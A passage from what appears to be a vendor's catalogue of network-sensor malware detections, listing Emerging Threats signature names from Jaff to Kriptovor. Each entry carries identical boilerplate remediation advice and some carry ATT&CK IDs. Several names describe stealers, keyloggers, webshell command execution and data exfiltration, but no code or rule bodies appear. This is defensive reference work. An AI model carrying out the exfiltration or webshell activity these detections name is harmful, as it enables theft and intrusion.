Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Jaff Ransomware Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE JAR/Qealler Stealer HTTP Headers Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jasmin Ransomware C2 Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE JasperLoader CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jasper URI Path Observed M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jasper URI Path Observed M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jasper URI Path Observed M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jasper URI Path Observed M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Java Archive sent when remote host claims to send an image

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Java Download non Jar file

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Java/QRat Retrieving PE

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JavaScriptBackdoor HTTP GET CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Javascript Click and Removal of Download Element

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Javascript Displays malicious download page

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jembot PHP Webshell (file upload)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jembot PHP Webshell (system command)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE jFect HTTP CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Joanap CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jorik FakeAV GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Agent.NZH CnC Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/HTA Downloader Behavior M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS.InfectedMikrotik Injects Domain Observed in TLS SNI

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Nemucod.M.gen requesting EXE payload 2015-10-07

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Nemucod.M.gen requesting EXE payload 2015-11-02

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Nemucod.M.gen requesting PDF payload 2015-10-07

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Nemucod.M.gen requesting PDF payload 2015-11-02

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Nemucod requesting EXE payload 2015-12-01

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Nemucod requesting EXE payload 2016-01-28

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Nemucod requesting EXE payload 2016-02-06

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Nemucod requesting EXE payload 2016-03-31

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Ostap CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Ostap Maldoc Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JsOutProx CnC Activity - Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JsOutProx CnC Activity - Outbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JsOutProx Variant CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/RAA Ransomware check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE JS/Skimmer Inbound (Likely MageCart) M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS Sniffer Framework Sending to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Spy.Agent.AW Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/TrojanDownloader.Agent.TXV CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/Unk Downloader 0 Byte POST CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/WSF Downloader Dec 08 2016 M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/WSF Downloader Dec 08 2016 M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/WSF Downloader Dec 08 2016 M6

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JS/WSF Downloader Dec 08 2016 M7

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE JunkMiner Downloader Communicating with CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jupyter Stealer CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jupyter Stealer Reporting System Information

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jupyter Stealer Reporting System Information M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Jupyter Stealer Reporting System Information M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kaseya VSA Exploit Activity M1 (SET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kaseya VSA Exploit Activity M2 (SET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kazy Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kazy/Kryptor/Cycbot Trojan Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kazy/Kryptor/Cycbot Trojan Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kelihos/Hlux GET jucheck.exe from CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kelihos.K Executable Download DGA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KeyBase Keylogger Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KeyBase Keylogger HTTP Pattern

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KeyBase Keylogger Uploading Screenshots

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KeyloggerOnline Keylogger Checkin (go https)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KeyloggerOnline Keylogger Checkin (kill)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KeyloggerOnline Keylogger Checkin (sleep)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KimJongRAT cnc exe pull

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky CSPY Downloader Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky KGH Backdoor CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky KGH Backdoor CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky KGH Backdoor Secondary Payload Download Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky KGH Malware Suite Checkin M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky KGH Malware Suite Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky Maldoc Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky Maldoc Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky Maldoc Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky Operation Blue Estimate CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky Related Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky Related Activity Sending Windows Information (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky Related Maldoc Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kimsuky WildCommand CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KINS/ZeusVM Variant CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE KINS/ZeusVM Variant Retrieving Config

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kishop.A checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KLog Nick Keylogger Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Knockbot Proxy Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Knock.php Shiz or Rohimafo CnC Server Contact URL

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Known Malicious Doc Downloading Payload Dec 06 2016

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Known Malicious Expires Header Seen In Malicious JavaScript Downloader Campaign

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Known Sinkhole Response Header

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Known Sinkhole Response Header

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Known Sinkhole Response Header

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Known Sinkhole Response Header

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Known Sinkhole Response Header CERT.PL

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Known Sinkhole Response Header INetSim

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Known Skunkx DDOS Bot User-Agent Cyberdog

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Konni RAT Exfiltrating Data

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Konni RAT Querying CnC for Commands

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Konni Stage 2 Payload Exfiltrating Data

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Koobface C&C availability check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Koobface Checkin via POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Koobface HTTP Request (2)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Koobface Trojan HTTP Post Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kovter Ransomware Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE KPOT Stealer Initial CnC Activity M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE KPOT Stealer Initial CnC Activity M5

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kraken Ransomware End Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Kraken Ransomware Start Activity 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Kriptovor Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kriptovor External IP Lookup checkip.dyndns.org

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Kriptovor Retrieving RAR Payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

